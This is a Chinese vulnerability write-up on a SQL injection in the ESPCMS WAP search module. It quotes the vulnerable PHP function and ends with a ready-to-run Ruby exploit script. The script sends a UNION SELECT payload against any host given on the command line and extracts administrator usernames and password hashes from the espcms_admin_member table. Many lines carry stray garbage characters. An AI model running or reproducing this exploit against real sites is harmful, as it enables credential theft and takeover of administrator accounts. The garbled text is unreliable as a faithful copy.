espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
0×2 PoC


+ ~" y  `/ \' x, C
0×0 漏洞概述

" h8 ^& @* u2 U$ d8 \$ B1 e+ C: f% B易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
其在处理传入的参数时考虑不严谨导致SQL注入发生
& u1 ^5 o# L' H! M7 g- i
1 o$ a+ L! v  `
: p, E6 B+ t) g' g/ V0×1 漏洞细节

' M  L+ M4 n- {8 p/ h+ p变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
' p! i' L0 Y5 U3 \! g" p而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。
# [! r0 Z# z) `! e+ O/ v) q( M
* U7 U. c  w& c* ~! J3 I在/interface/3gwap_search.php文件的in_result函数中:
, D( \/ l1 x( W% e, ~# X1 c% Z


       function in_result() {
: _! [0 {) d' }! f9 X( B- b            ... ... ... ... ... ... ... ... ...
& @& E1 G  z. e/ W. Y2 t% H5 `            $urlcode = $_SERVER[ 'QUERY_STRING '];
6 `, k8 G1 k0 O  @            parse_str(html_entity_decode($urlcode), $output);
# d) g$ p/ r8 }  K
( Z8 P% h1 w/ N            ... ... ... ... ... ... ... ... ...
7 g+ u6 p/ X6 w            if (is_array($output['attr' ]) && count($output['attr']) > 0) {

; J* S6 k& V6 z# A' p% v                  $db_table = db_prefix . 'model_att';

                   foreach ($output['attr' ] as $key => $value) {
/ I4 ^2 S! y) A% C                         if ($value) {

                              $key = addslashes($key);
                              $key = $this-> fun->inputcodetrim($key);
: j4 U) J- ]! M. d1 e! s. E  ?                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                              $countnum = $this->db_numrows($db_table, $db_att_where);
                               if ($countnum > 0) {
" x. ]# f' L. {. _4 A' I                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
                              }
1 p- a' v( c$ M                        }
* L9 t3 {$ J* m/ z                  }
            }
            if (!empty ($keyword) && empty($keyname)) {
) q! l6 i6 F  m- p                  $keyname = 'title';
( d6 e' e- `! K5 `                  $db_where.= " AND a.title like '%$keyword%'" ;
            } elseif (!empty ($keyword) && !empty($keyname)) {
2 K" V  p: P1 c, q- P) S: \7 i                  $db_where.= " AND $keyname like '% $keyword%'";
, |' f+ t' \0 o5 x7 L7 U. ^! d            }
            $pagemax = 15;
  j; C! S1 v* T" \* d+ b
            $pagesylte = 1;
; b& Q7 L5 B6 p/ q# V; X" t
# e5 h! E6 C4 u6 ?             if ($countnum > 0) {
/ J2 P9 p- R* t
                  $numpage = ceil($countnum / $pagemax);
            } else {
3 ?- s: ^. x9 v9 b1 @8 x' c                  $numpage = 1;
            }
' e$ I: F/ D9 o* H# `5 O: C* e            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
8 j1 E, A. K& M: e6 P5 d            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
            ... ... ... ... ... ... ... ... ...
& }3 [8 x. a, k: n! ^4 F1 K/ k      }
/ w! E# D# r9 i$ v( M8 C
4 s  C1 @! ?! t
6 O, j. [" s8 u* b0×2 PoC



% ~+ ?2 s( ]4 F1 ]  ^require "net/http"
; [: ?7 U$ B1 H9 Y" V
' v* U% e* m) Y: C7 I- ydef request(method, url)
    if method.eql?("get")
! Y- _* b$ b! V! o( v7 C1 j        uri = URI.parse(url)
        http = Net::HTTP.new(uri.host, uri.port)
        response = http.request(Net::HTTP::Get.new(uri.request_uri))
+ {9 \) e$ P& K. W, r' i        return response
2 ~# t+ g0 p# Q! X    end
$ G8 `) F6 f1 Q3 o8 @end

7 U7 A% f5 r  @$ i; p7 \doc =<<HERE
-------------------------------------------------------
- U# s) f( u- K% u/ B6 j# y) wEspcms Injection Exploit
Author:ztz
Blog:http://ztz.fuzzexp.org/
1 m2 P- o( [, |: I" S8 g. D0 G-------------------------------------------------------

HERE

  V3 X2 B& n- X0 g. {# k' U- Z  uusage =<<HERE
8 [8 P4 C9 Y9 U+ QUsage:         ruby #{$0} host port path
example:     ruby #{$0} www.target.com 80 /
HERE

puts doc
0 ^4 \9 J# {- n& E% `7 tif ARGV.length < 3
    puts usage
else
3 W" Q- m( ]' }3 j" P9 L* ]    $host = ARGV[0]
" M  o& e* E% K; l4 t    $port = ARGV[1]
    $path = ARGV[2]
, [( O' b" l  B6 e! W7 S0 q2 P2 q" q
    puts "

send request..."
    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
4 B% r  Z2 T+ I+ C$ m. Vattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
    response = request("get", url)
    result = response.body.scan(/\w+&\w{32}/)
    puts result
3 o# f, v* |' Bend
7 a) h/ S6 \7 o3 k
: h* o  c5 J  C5 I; r; e